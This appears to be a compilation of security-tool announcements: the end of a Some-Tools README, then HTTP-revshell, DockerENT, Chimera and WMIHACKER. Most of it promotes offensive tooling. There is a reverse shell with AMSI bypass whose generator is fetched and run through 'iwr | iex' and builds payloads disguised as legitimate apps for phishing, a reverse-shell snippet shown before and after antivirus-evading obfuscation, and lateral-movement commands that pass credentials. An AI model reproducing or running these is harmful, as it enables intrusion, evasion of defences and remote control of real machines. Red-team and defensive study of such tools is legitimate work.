    # a better example
    $ ./sometools.sh add-tool LinEnum PrivEsc-Lin
  • install-tool and update-tool using scrapy
    Sometimes a tool needs to be downloaded via the releases/latest page, like pspy from DominicBreuker. So, to always be able to update and download the latest version, the process needed a little twist with Python and Scrapy. If you add a new tool using this pattern, you can use the function below in your install-tool.sh and update-tool.sh files.
    # example with pspy
    # this is not a full script, only a function. Should be part of an install and/or update script.
    # function that uses some-scrapper.py
    function specialTool() {
        urlGit="https://github.com"
        ## You should modify the urlTool variable (should be the only modification)
        urlTool="DominicBreuker/pspy/releases/latest"

        # scrapy command
        scrapy runspider $SOME_ROOT/some-scrapper.py -a start_url="$urlGit/$urlTool" -o output.csv >/dev/null 2>&1
        # Preparing the txt file before downloading
        mv output.csv output.txt
        sort output.txt | uniq -d | tee output2.txt >/dev/null 2>&1
        rm output.txt
        sed -i -e 's#^#'"$urlGit"'#' output2.txt

        # Downloading each line with wget
        while IFS= read -r line; do
            wget $(echo "$line" | tr -d '\r') #> /dev/null 2>&1
        done <output2.txt

        # Cleaning up (sed -i -e leaves an output2.txt-e backup file on some systems)
        rm output2.txt
        rm output2.txt-e
    }
    specialTool
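    As an aside (not part of Some-Tools), the same list of latest-release assets can be fetched without scraping by using GitHub's REST API. A minimal Python sketch, assuming network access and that the repo publishes release assets:
    # github_latest.py - hypothetical helper, not part of Some-Tools
    # Lists asset download URLs for a repo's latest release via the GitHub REST API.
    import json
    import urllib.request

    def latest_release_assets(repo):
        """Return the browser_download_url of every asset of the latest release of owner/repo."""
        url = "https://api.github.com/repos/{}/releases/latest".format(repo)
        with urllib.request.urlopen(url) as resp:
            release = json.load(resp)
        return [asset["browser_download_url"] for asset in release["assets"]]

    if __name__ == "__main__":
        for asset_url in latest_release_assets("DominicBreuker/pspy"):
            print(asset_url)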
  • info:
    • Show the README.md file of an installed tool.
    • Instead of using the tool name, you can use its ID number, shown when you run ./sometools.sh list.
    • Bat or cat?
    • I love using bat instead of cat, so when the info action is used, some-tools will try to detect the bat binary. If it finds it, it will ask you to choose between bat and cat.
    • If you don't know what I'm talking about, don't worry: cat will be used by default, without asking, if no bat is detected.
    $ ./sometools.sh info LinEnum
    # example using an ID number
    $ ./sometools.sh info 7
  • complete-uninstall:
    • Delete all installed tools, remove bin directory and delete our modification in .zshrc or .bashrc
    • Only the some-tools section in your .zshrc or .bashrc file will be deleted, so any modifications you made along the way will be kept.
    • After the complete uninstall, you should have two backup copies of your .zshrc or .bashrc alongside the current one: one ending in .backup, created at the initial setup, and a second ending in .backup2, created just before the sometools section is deleted during the complete-uninstall process.
    $ ./sometools.sh complete-uninstall

Vagrantfile
Install Some-Tools within a brand new Kali 2020.x VM using Vagrant. This repo includes a Vagrantfile for the Kali-Linux 2020.x release; you can see the original vagrant box at https://app.vagrantup.com/nicmilot/boxes/kali-full-2020. Providers for this box are VMWare Fusion and Virtualbox.
I'm using VMware Fusion, so this Vagrantfile is configured that way. You can modify the vagrant box information to fit your needs. If you are using Virtualbox, just switch the comments in the Vagrantfile.
How to use it ? (Complete install with brand new Kali VM in 5 commands):
# Download Vagrantfile from this repo
$ wget https://raw.githubusercontent.com/som3canadian/Some-Tools/master/Vagrantfile
# start the kali box
$ vagrant up
# connect ssh to the kali box
$ vagrant ssh
# cd into some-tools
$ cd Desktop/Some-Tools
# setup some-tools
$ ./sometools.sh setup
# Verify the installation by:
# 1. open new terminal tab or window
# 2. cd ~/Desktop/Some-Tools
# 3. ./sometools.sh list

Others
  • When using the ID number instead of tool name, be sure to use the ID number from ./sometools.sh list and not ./sometools.sh list-installed
  • If you add a new tool that needs specific update instructions, you can create the file update-tool.sh in the tool dir (like the install-tool.sh and uninstall-tool.sh files). When you run check-update, the some-tools.sh script will take it into consideration.
  • You can't use the same name for two tools; it will cause problems, and the add-tool action checks for that. A workaround would be to require the category name with every action, but I really don't want that. Since using a different name is easy, I have no intention for the moment to develop a solution that allows the same name for multiple tools.
  • Some of the tools you install may ask you for sudo permissions!
  • The check-git.sh file included in the repo is for the check-update and check-update-all actions.
  • I'm building this in my free time, so it may have some bugs. If the stars start to grow, I may put in more time and effort.

Acknowledgements
Built from the idea of https://github.com/eugenekolo/sec-tools and https://github.com/zardus/ctf-tools.


HTTP-revshell - Powershell Reverse Shell Using HTTP/S Protocol With AMSI Bypass And Proxy Aware


HTTP-revshell is a tool focused on red team exercises and pentesters. It provides a reverse connection over the HTTP/S protocol, using a covert channel to gain control over the victim machine through web requests and thus evade solutions such as IDS, IPS and AV.

Help server.py (unisession server)
Server usage:
usage: server.py [-h] [--ssl] [--autocomplete] host port

Process some integers.

positional arguments:
host Listen Host
port Listen Port

optional arguments:
-h, --help show this help message and exit
--ssl Send traffic over ssl
--autocomplete Autocomplete powershell functions
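For example, to listen on all interfaces on port 443 over SSL (an illustrative invocation built from the usage text above):
python3 server.py 0.0.0.0 443 --ssl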

Help Invoke-WebRev.ps1 (client)
Client usage:
Import-Module .\Invoke-WebRev.ps1
Invoke-WebRev -ip IP -port PORT [-ssl]

Installation
git clone https://github.com/3v4Si0N/HTTP-revshell.git
cd HTTP-revshell/
pip3 install -r requirements.txt

Quick start server-multisession.py (multisession server)
This server allows multiple client connections.
There is a menu with three basic commands: sessions, interact and exit
- sessions --> show currently active sessions
- interact --> interacts with a session (Example: interact <session_id>)
- exit --> close the application
IMPORTANT: To change the session press CTRL+d to exit the current session without closing it.

Features
  • SSL
  • Proxy Aware
  • Upload Function
  • Download Function
  • Error Control
  • AMSI bypass
  • Multiple sessions [only server-multisession.py]
  • Autocomplete PowerShell functions (optional) [only server.py]

Extra functions usage

Upload
  • upload /src/path/file C:\dest\path\file

Download
  • download C:\src\path\file /dst/path/file

Help Revshell-Generator.ps1 (Automatic Payload Generator)
This script allows you to create an executable file with the payload necessary to use HTTP-revshell; just follow the on-screen instructions to generate it. There are 6 predefined templates and a customizable one that takes whatever data you like.
The payloads generated by the tool incorporate the legitimate icon of the application, as well as the product and copyright information of the original application. In addition, each of them opens the original application before establishing the connection with the server, pretending to be a legitimate application. This can be used for phishing or Red Team exercises.
Payload Generator usage:
iwr -useb https://raw.githubusercontent.com/3v4Si0N/HTTP-revshell/Revshell-Generator.ps1 | iex

IMPORTANT: All fields in predefined templates are auto-complete by pressing the enter key.

Credits


DockerENT - The Only Open-Source Tool To Analyze Vulnerabilities And Configuration Issues With Running Docker Container(S) And Docker Networks


DockerENT is activE ruNtime application security scanning Tool (RAST tool) and framework which is pluggable and written in python. It comes with a CLI application and clean Web Interface written with StreamLit.
DockerENT has been designed keeping in mind that weak configurations can slip through to production deployments and lead to severe consequences. This application connects to running containers in the system, fetches the list of weak and vulnerable runtime configurations and generates a report. If invoked through the CLI it can create JSON and HTML reports. If invoked through the web interface, it displays the scan and audit report in the UI itself.

How to Run

TL;DR
In a hurry to test this? Download the latest stable release from PyPI and run the Web App; everything else is intuitive.
pip install DockerENT
Then run the application like:
DockerENT -w
That's it.

Run the latest master
DockerENT has been designed with simplicity and usability in mind. Currently you just have to clone the repository and download the dependencies. Once the dependencies are installed in the local system, you are good to run the tool and analyse the runtime configurations of running containers.
# Download and setup
git clone https://github.com/r0hi7/DockerENT.git
cd DockerENT
make venv
source venv/bin/activate

# Run
python -m DockerENT --help
usage: Find the vulnerabilities hidden in your running container(s).
[-h] [-d [DOCKER_CONTAINER]] [-p [DOCKER_PLUGINS]]
[-d-nw [DOCKER_NETWORK]] [-p-nw [DOCKER_NW_PLUGINS]] [-w]
[-n [PROCESS_COUNT]] [-a] [-o [OUTPUT]]

optional arguments:
-h, --help show this help message and exit
-w, --web-app Run DockerENT in WebApp mode. If this parameter is
enabled, other command line flags will be ignored.
-n [PROCESS_COUNT], --process [PROCESS_COUNT]
Run scans in parallel (Process pool count).
-a, --audit Flag to check whether to audit results or not.

-d [DOCKER_CONTAINER], --docker [DOCKER_CONTAINER]
Run scan against the running container.
-p [DOCKER_PLUGINS], --plugins [DOCKER_PLUGINS]
Run scan with only specified plugins.
-p-nw [DOCKER_NW_PLUGINS], --nw-plugins [DOCKER_NW_PLUGINS]
Run scan with only specified plugins.

-d-nw [DOCKER_NETWORK], --docker-network [DOCKER_NETWORK]
Run scan against running docker-network.

-o [OUTPUT], --output [OUTPUT]
Output plugin to write data to.
See this quick video to get started with.

Features
  • Plugin driven framework.
  • Use low level docker api to interact with running containers.
  • Clean and Easy to Use UI.
  • Comes with 9 docker scan plugins out of which, 6 plugins can audit results.
  • Framework ready to work with docker-networks.
  • Output plugins can write to file and html sinks.
  • The only open source interactive docker scanning tool.
  • Can run plugins in parallel.
  • Under active development.

How to Create your own Plugin.
  • Have some idea for a runtime scan to perform?
  • Copy the sample plugin file to create your demo plugin:
cp DockerENT/docker_plugins/docker_sample_plugin.py DockerENT/docker_plugins/docker_demo_plugin.py
  • Just make sure you maintain the following structure.
import logging

# logger setup (adjust to match DockerENT's own logging helpers)
_log = logging.getLogger(__name__)

_plugin_name_ = 'demo_plugin'


def scan(container, output_queue, audit=False, audit_queue=None):
    _log.info('Starting {} Plugin ...'.format(_plugin_name_))

    res = {}

    result = {
        'test_class': {
            'TEST_NAME': ['good']
        }
    }

    res[container.short_id] = {
        _plugin_name_: result
    }

    # Do something magical.

    _log.info('Completed execution of {} Plugin.'.format(_plugin_name_))

    '''Make sure you put a dict of the following structure in the Q.
    {
        'container_id': {
            'plugin_name': {
                'test_name_demo1': {
                    'results': []
                },
                'test_name_demo2': {
                    'results': []
                }
            }
        }
    }
    '''
    output_queue.put(res)

    if audit:
        _audit(container, res, audit_queue)


def _audit(container, results, audit_queue):
    '''Make sure to add a dict of the following structure to the Audit Q.
    res = {
        "container_id": [
            "_plugin_name_, WARN/INFO/ERROR, details"
        ]
    }
    '''
    # Magical logic to perform the audit goes here; a minimal placeholder:
    res = {
        container.short_id: [
            '{}, INFO, demo audit entry'.format(_plugin_name_)
        ]
    }
    audit_queue.put(res)
  • That's it. Still confused? Explain your idea in Issues and I will review it and help you out, or we may end up working on it together.
  • This plugin will automatically appear in the drop-down in the UI. Easy, right?
  • Sit back and evaluate the results.

Plugins Features:
Plugin Name | Plugin File | Feature | Audit
CMD_HISTORY | File | Identify shell history | Root history and user shell history
FILESYSTEM | File | Identify RW file systems | If RW file systems are present.
NETWORK | File | Identify network state | Identifies all mapped ports.
PLAINTEST_PASSWORD | File | Identify passwords in different files |
SECURITY_PROFILES | File | Identify weak security profiles | List weak security profiles.
USER_INFO | File | Identify user info | List permissions in passwd and other sensitive files
SYSTEM_INFO | File | Identify docker system info | No audit
FILES_INFO | File | Identify world-writeable directories and files | List all such files.

CLI interface

Pros
  • Rich logging interface that helps with debugging through extensive debug logs.
  • Can run in parallel; just pass -n <count> to specify the process pool size.
  • Can dump output in JSON and HTML file.

Cons
  • Audit output is not dumped to file.
  • Selecting multiple specific dockers is a pain.

UI Interface

Pros
  • Clean, and easy to use UI.
  • Everything at one single page.
  • Ease of selecting multiple docker images, multiple plugins and multiple docker-networks.
  • Audit report present.

Cons
  • Logging interface not Rich.
  • JSON reports are bulky.
  • Rely on third party lib StreamLit, all issues with framework are inherent.

Help Make this tool better
  • Create a PR, Issues are more than welcome.
  • Try it, test it and enhance it.


Chimera - PowerShell Obfuscation Script Designed To Bypass AMSI And Commercial Antivirus Solutions


Chimera is a (shiny and very hack-ish) PowerShell obfuscation script designed to bypass AMSI and antivirus solutions. It digests malicious PS1's known to trigger AV and uses string substitution and variable concatenation to evade common detection signatures.

Chimera was created for this write-up and is further evidence of how trivial it is to bypass detection signatures. Hopefully, this repository will inspire someone to build something robust and more reliable.

How Chimera works...
Below is a snippet of Nishang's Invoke-PowerShellTcp.ps1, found at nishang/Shells. VirusTotal reports 25 detections of the PS1 script.
$stream = $client.GetStream()
[byte[]]$bytes = 0..65535|%{0}

#Send back current username and computername
$sendbytes = ([text.encoding]::ASCII).GetBytes("Windows PowerShell running as user " + $env:username + " on " + $env:computername + "`nCopyright (C) 2015 Microsoft Corporation. All rights reserved.`n`n")
$stream.Write($sendbytes,0,$sendbytes.Length)

#Show an interactive PowerShell prompt
$sendbytes = ([text.encoding]::ASCII).GetBytes('PS ' + (Get-Location).Path + '>')
$stream.Write($sendbytes,0,$sendbytes.Length)


And here it is again, after Chimera. VirusTotal reports 0 detections of the obfuscated version.
  # Watched anxiously by the Rebel command, the fleet of small, single-pilot fighters speeds toward the massive, impregnable Death Star.
$xdgIPkCcKmvqoXAYKaOiPdhKXIsFBDov = $jYODNAbvrcYMGaAnZHZwE."$bnyEOfzNcZkkuogkqgKbfmmkvB$ZSshncYvoHKvlKTEanAhJkpKSIxQKkTZJBEahFz$KKApRDtjBkYfJhiVUDOlRxLHmOTOraapTALS"()
# As the station slowly moves into position to obliterate the Rebels, the pilots maneuver down a narrow trench along the station’s equator, where the thermal port lies hidden.
[bYte[]]$mOmMDiAfdJwklSzJCUFzcUmjONtNWN = 0..65535|%{0}
# Darth Vader leads the counterattack himself and destroys many of the Rebels, including Luke’s boyhood friend Biggs, in ship-to-ship combat.

# Finally, it is up to Luke himself to make a run at the target, and he is saved from Vader at the last minute by Han Solo, who returns in the nick of time and sends Vader spinning away from the station.
# Heeding Ben's disembodied voice, Luke switches off his computer and uses the Force to guide his aim.
# Against all odds, Luke succeeds and destroys the Death Star, dealing a major defeat to the Empire and setting himself on the path to becoming a Jedi Knight.
$PqJfKJLVEgPdfemZPpuJOTPILYisfYHxUqmmjUlKkqK = ([teXt.enCoDInG]::AsCII)."$mbKdotKJjMWJhAignlHUS$GhPYzrThsgZeBPkkxVKpfNvFPXaYNqOLBm"("WInDows Powershell rUnnInG As User " + $TgDXkBADxbzEsKLWOwPoF:UsernAMe + " on " + $TgDXkBADxbzEsKLWOwPoF:CoMPUternAMe + "`nCoPYrIGht (C) 2015 MICrosoft CorPorAtIon. All rIGhts reserveD.`n`n")
# Far off in a distant galaxy, the starship belonging to Princess Leia, a young member of the Imperial Senate, is intercepted in the course of a secret mission by a massive Imperial Star Destroyer.
$xdgIPkCcKmvqoXAYKaOiPdhKXIsFBDov.WrIte($PqJfKJLVEgPdfemZPpuJOTPILYisfYHxUqmmjUlKkqK,0,$PqJfKJLVEgPdfemZPpuJOTPILYisfYHxUqmmjUlKkqK.LenGth)
# An imperial boarding party blasts its way onto the captured vessel, and after a fierce firefight the crew of Leia’s ship is subdued.


Chimera does several things to obfuscate the source. The transformer function will separate strings into multiple pieces and reconstruct them as new variables.
For example, it will take a string like ... New-Object System.Net.Sockets.TCPClient ... and convert it to:
$a = "Syste"
$b = "m.Net.Soc"
$c = "kets.TCP"
$d = "Client"

... New-Object $a$b$c$d ...
The function separates commonly flagged data types and strings into several chunks. It defines the chunks and concatenates them at the top of the script. A higher --level will result in smaller chunks and more variables.
$CNiJfmZzzQrqZzqKqueOBcUVzmkVbllcEqjrbcaYzTMMd = "`m"
$quiyjqGdhQZgYFRdKpDGGyWNlAjvPCxQTTbmFkvTmyB = "t`Rea"
$JKflrRllAqgRlHQIUzOoyOUEqVuVrqqCKdua = "Get`s"
$GdavWoszHwDVJmpYwqEweQsIAz = "ti`ON"
$xcDWTDlvcJfvDZCasdTnWGvMXkRBKOCGEANJpUXDyjPob = "`L`O`Ca"
$zvlOGdEJVsPNBDwfKFWpvFYvlgJXDvIUgTnQ = "`Get`-"
$kvfTogUXUxMfCoxBikPwWgwHrvNOwjoBxxto = "`i"
$tJdNeNXdANBemQKeUjylmlObtYp = "`AsC`i"
$mhtAtRrydLlYBttEnvxuWkAQPTjvtFPwO = "`G"
$PXIuUKzhMNDUYGZKqftvpAiQ = "t`R`iN
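The same chunking idea can be sketched in a few lines of Python (illustrative only; this is not Chimera's actual code, and the variable-name and chunk-size choices here are arbitrary):
# chunker.py - toy sketch of Chimera-style string splitting
import random
import string

def random_var(length=24):
    # Random PowerShell-style variable name
    return "$" + "".join(random.choices(string.ascii_letters, k=length))

def chunk(s, max_len=6):
    # Split s into random-length pieces; smaller pieces mean more variables
    pieces, i = [], 0
    while i < len(s):
        step = random.randint(1, max_len)
        pieces.append(s[i:i + step])
        i += step
    return pieces

def obfuscate(s):
    # Emit one assignment per piece, then the concatenated reference
    names, lines = [], []
    for piece in chunk(s):
        name = random_var()
        names.append(name)
        lines.append('{} = "{}"'.format(name, piece))
    lines.append("... New-Object " + "".join(names) + " ...")
    return "\n".join(lines)

print(obfuscate("System.Net.Sockets.TCPClient"))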

Usage
Clone the repository. Tested in Kali v2020.3.
sudo apt-get update && sudo apt-get install -Vy sed xxd libc-bin curl jq perl gawk grep coreutils git
sudo git clone https://github.com/tokyoneon/chimera /opt/chimera
sudo chown $USER:$USER -R /opt/chimera/; cd /opt/chimera/
sudo chmod +x chimera.sh; ./chimera.sh --help
Basic usage.
./chimera.sh -f shells/Invoke-PowerShellTcp.ps1 -l 3 -o /tmp/chimera.ps1 -v -t powershell,windows,\
copyright -c -i -h -s length,get-location,ascii,stop,close,getstream -b new-object,reverse,\
invoke-expression,out-string,write-error -j -g -k -r -p
Review the usage guide and write-up for more examples and screenshots.

Shells
In the shells/ directory are several Nishang scripts and a few generic ones. All have been tested and should work fine, but there's no telling how untested scripts will behave after being processed by Chimera...
Change the hardcoded IP addresses.
sed -i 's/192.168.56.101/<YOUR-IP-ADDRESS>/g' shells/*.ps1
ls -laR shells/

shells/:
total 60
-rwxrwx--- 1 tokyoneon tokyoneon 1727 Aug 29 22:02 generic1.ps1
-rwxrwx--- 1 tokyoneon tokyoneon 1433 Aug 29 22:02 generic2.ps1
-rwxrwx--- 1 tokyoneon tokyoneon 734 Aug 29 22:02 generic3.ps1
-rwxrwx--- 1 tokyoneon tokyoneon 4170 Aug 29 22:02 Invoke-PowerShellIcmp.ps1
-rwxrwx--- 1 tokyoneon tokyoneon 281 Aug 29 22:02 Invoke-PowerShellTcpOneLine.ps1
-rwxrwx--- 1 tokyoneon tokyoneon 4404 Aug 29 22:02 Invoke-PowerShellTcp.ps1
-rwxrwx--- 1 tokyoneon tokyoneon 594 Aug 29 22:02 Invoke-PowerShellUdpOneLine.ps1
-rwxrwx--- 1 tokyoneon tokyoneon 5754 Aug 29 22:02 Invoke-PowerShellUdp.ps1
drwxrwx--- 1 tokyoneon tokyoneon 4096 Aug 28 23:27 misc
-rwxrwx--- 1 tokyoneon tokyoneon 616 Aug 29 22:02 powershell_reverse_shell.ps1

shells/misc:
total 36
-rwxrwx--- 1 tokyoneon tokyoneon 1757 Aug 12 19:53 Add-RegBackdoor.ps1
-rwxrwx--- 1 tokyoneon tokyoneon 3648 Aug 12 19:53 Get-Information.ps1
-rwxrwx--- 1 tokyoneon tokyoneon 672 Aug 12 19:53 Get-WLAN-Keys.ps1
-rwxrwx--- 1 tokyoneon tokyoneon 4430 Aug 28 23:31 Invoke-PortScan.ps1
-rwxrwx--- 1 tokyoneon tokyoneon 6762 Aug 29 00:27 Invoke-PoshRatHttp.ps1

Resources


WMIHACKER - A Bypass Anti-virus Software Lateral Movement Command Execution Tool


中文版(Chinese version)
Disclaimer: The technology involved in this project is only for security learning and defense purposes, illegal use is prohibited!
Bypass anti-virus software lateral movement command execution test tool (no need for port 445)
Introduction: Common tools such as WMIEXEC and PSEXEC execute commands by creating a service or calling Win32_Process.Create; these methods are intercepted by anti-virus software 100% of the time, so we created WMIHACKER, a lateral movement command execution test tool that bypasses anti-virus software and does not need port 445.
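For contrast, the classic Win32_Process.Create path that AV products typically flag is the stock wmic one-liner below (shown purely to illustrate the call path WMIHACKER avoids; the host, credentials and output path are placeholders mirroring the examples further down):
> wmic /node:172.16.94.187 /user:administrator /password:Password! process call create "cmd.exe /c systeminfo > c:\1.txt"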
Main functions: 1. Command execution; 2. File upload; 3. File download



How to use
C:\Users\administrator\Desktop>cscript //nologo WMIHACKER_0.6.vbs

__ ____ __ _____ _ _ _____ _ ________ _____
\ \ / / \/ |_ _| | | | | /\ / ____| |/ / ____| __ \
\ \ /\ / /| \ / | | | | |__| | / \ | | | ' /| |__ | |__) |
\ \/ \/ / | |\/| | | | | __ | / /\ \| | | < | __| | _ /
\ /\ / | | | |_| |_ | | | |/ ____ \ |____| . \| |____| | \ \
\/ \/ |_| |_|_____| |_| |_/_/ \_\_____|_|\_\______|_| \_\
v0.6beta By. Xiangshan@360RedTeam
Usage:
WMIHACKER.vbs /cmd host user pass command GETRES?

WMIHACKER.vbs /shell host user pass

WMIHACKER.vbs /upload host user pass localpath remotepath

WMIHACKER.vbs /download host user pass localpath remotepath

/cmd single command mode
host hostname or IP address
GETRES? Res Need Or Not, Use 1 Or 0
command the command to run on remote host
The result is displayed after the command is executed
> cscript WMIHACKER_0.6.vbs /cmd 172.16.94.187 administrator "Password!" "systeminfo" 1
No results are displayed after the command is executed
> cscript WMIHACKER_0.6.vbs /cmd 172.16.94.187 administrator "Password!" "systeminfo > c:\1.txt" 0
shell mode
> cscript WMIHACKER_0.6.vbs /shell 172.16.94.187 administrator "Password!"
File upload: copy the local calc.exe to the remote host c:\calc.exe
> cscript wmihacker_0.4.vbe /upload 172.16.94.187 administrator "Password!" "c:\windows\system32\calc.exe" "c:\calc"
File download: Download the remote host calc.exe to the local c:\calc.exe
> cscript wmihacker_0.4.vbe /download 172.16.94.187 administrator "Password!" "c:\calc" "c:\windows\system32\calc.exe"

